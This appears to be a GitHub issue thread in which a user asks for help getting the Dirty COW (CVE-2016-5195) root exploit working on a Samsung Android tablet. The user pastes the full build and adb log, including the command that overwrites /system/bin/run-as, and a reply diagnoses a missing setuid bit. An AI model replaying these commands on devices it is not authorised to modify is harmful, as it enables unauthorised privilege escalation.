setresgid/setresuid failed; looking for some help to get the exploit working

[connorbode]

Hey guys, looking for a bit of direction for getting this exploit working on my device. It's a Samsung Galaxy E 7" Lite, running at android SDK 19 (based on adb shell getprop ro.build.version.sdk).

I've attempted to build for APP_PLATFORM=android-19 and couldn't compile due to missing sys/capabilities.h headers. I've also attempted to increase the loop size without success.

I've pasted the output from my initial trial below. Interested in messing around with the code but need some direction as to what is potentially going wrong with the exploit.

Thanks!

→ make root
../ndk/ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
make[1]: Entering directory `~/Desktop/android_root/CVE-2016-5195'
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Compile thumb  : run-as <= run-as.c
[armeabi] Executable     : run-as
[armeabi] Install        : run-as => libs/armeabi/run-as
make[1]: Leaving directory `~/Desktop/android_root/CVE-2016-5195'
adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
1981 KB/s (13516 bytes in 0.006s)
adb push libs/armeabi/run-as /data/local/tmp/run-as
1157 KB/s (9420 bytes in 0.007s)
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
warning: new file size (9420) and file old size (9440) differ

size 9440

[*] mmap 0xb6ef6000
[*] exploit (patch)
[*] currently 0xb6ef6000=464c457f
[*] madvise = 0xb6ef6000 9440
[*] madvise = 0 1048576
[*] /proc/self/mem 1308622848 1048576
[*] exploited 0xb6ef6000=464c457f
adb shell /system/bin/run-as
running as uid 2000
setresgid/setresuid failed
uid 2000

[timwr]

It looks like your device is vulnerable but /system/bin/run-as does not have the setuid bit set on your device.